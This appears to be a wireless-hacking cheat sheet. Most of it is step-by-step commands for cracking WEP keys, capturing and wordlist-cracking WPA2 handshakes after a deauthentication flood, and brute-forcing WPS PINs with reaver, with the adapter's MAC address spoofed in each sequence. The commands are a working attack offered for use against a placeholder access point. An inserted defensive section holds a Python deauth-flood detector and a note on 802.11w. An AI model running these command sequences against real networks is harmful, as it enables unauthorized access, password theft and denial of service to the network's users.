Wireless hacking

WEP - Brute-force key recovery

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
airodump-ng wlan1mon
airodump-ng --bssid 00:11:22:33:44:55 -c 4 -w WEPcrack wlan1mon
aireplay-ng -1 0 -a 00:11:22:33:44:55 wlan1mon

Keep aireplay-ng running in the background while we start to

aireplay-ng -3 -b 00:11:22:33:44:55 wlan1mon

With aireplay-ng running, start cracking the WEP key using:

aircrack-ng WEPcrack-01.cap

WPA2 - Crack using a wordlist

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
airodump-ng wlan1mon
airodump-ng --bssid 00:11:22:33:44:55 -c 4 -w WPAcrack wlan1mon

With airodump-ng still running in another terminal, deauthenticate the clients so they reconnect and the handshake can be captured:

aireplay-ng --deauth 100 -a 00:11:22:33:44:55 wlan1mon

Keep replaying until you have captured the handshake (airodump-ng shows "WPA handshake: 00:11:22:33:44:55" in the top-right corner of its output). Now we can crack the password offline from the captured handshake with a wordlist.

gunzip /usr/share/wordlists/rockyou.txt.gz
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/fern-wifi/common.txt
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/rockyou.txt
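The defender-side counterpart of the deauth step above, added here as an example that is not part of the original cheat sheet: a small detector that flags a deauthentication/disassociation flood per BSSID from a constructed frame log, the signal a wireless IDS alerts on. The whitespace-separated log format and the sample frames are assumptions made for the example.

```python
"""Deauthentication-flood detector, the defender-side counterpart of the
deauth step above. Added example, not part of the original cheat sheet.

Input format (an assumption, modelled on a wireless sniffer's text export):
    <unix_timestamp> <subtype> <source_mac> <destination_mac> <bssid>
"""
from collections import defaultdict, deque


def build_sample_log():
    """Constructed sample: 60 spoofed deauths 'from' AP 00:11:22:33:44:55
    to broadcast, 10 ms apart, plus normal traffic and one ordinary
    deauth on a second AP (a client roaming away)."""
    lines = [
        "1700000000.000 beacon 00:11:22:33:44:55 ff:ff:ff:ff:ff:ff 00:11:22:33:44:55",
        "1700000000.050 data aa:bb:cc:dd:ee:01 00:11:22:33:44:55 00:11:22:33:44:55",
    ]
    for i in range(60):
        lines.append(f"{1700000001 + i * 0.010:.3f} deauth 00:11:22:33:44:55 "
                     "ff:ff:ff:ff:ff:ff 00:11:22:33:44:55")
    lines.append("1700000005.000 deauth 66:77:88:99:aa:bb aa:bb:cc:dd:ee:02 66:77:88:99:aa:bb")
    return lines


def parse_frame(line):
    """Split one log line into (timestamp, subtype, src, dst, bssid)."""
    ts, subtype, src, dst, bssid = line.split()
    return float(ts), subtype.lower(), src.lower(), dst.lower(), bssid.lower()


def detect_deauth_floods(lines, window_s=1.0, threshold=10):
    """Return {bssid: peak count} for each BSSID that saw at least `threshold`
    deauth/disassoc frames inside any `window_s` sliding window. A few deauths
    per second is ordinary roaming; tens per second at one BSSID is a flood."""
    frames = sorted(parse_frame(l) for l in lines if l.strip())
    recent = defaultdict(deque)   # bssid -> timestamps inside the current window
    peak = defaultdict(int)
    for ts, subtype, _src, _dst, bssid in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        peak[bssid] = max(peak[bssid], len(q))
    return {b: n for b, n in peak.items() if n >= threshold}
```

The flood only works because the access point accepts unauthenticated management frames; enabling Protected Management Frames (802.11w) makes spoofed deauth frames fail validation at the clients.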

WPS - Brute-force PIN recovery

airmon-ng start wlan1
iwconfig
ifconfig wlan1mon down
macchanger -m 20:17:03:00:00:01 wlan1mon
ifconfig wlan1mon up
wash -i wlan1mon
reaver -i wlan1mon -b 00:11:22:33:44:55 -vvv -K 1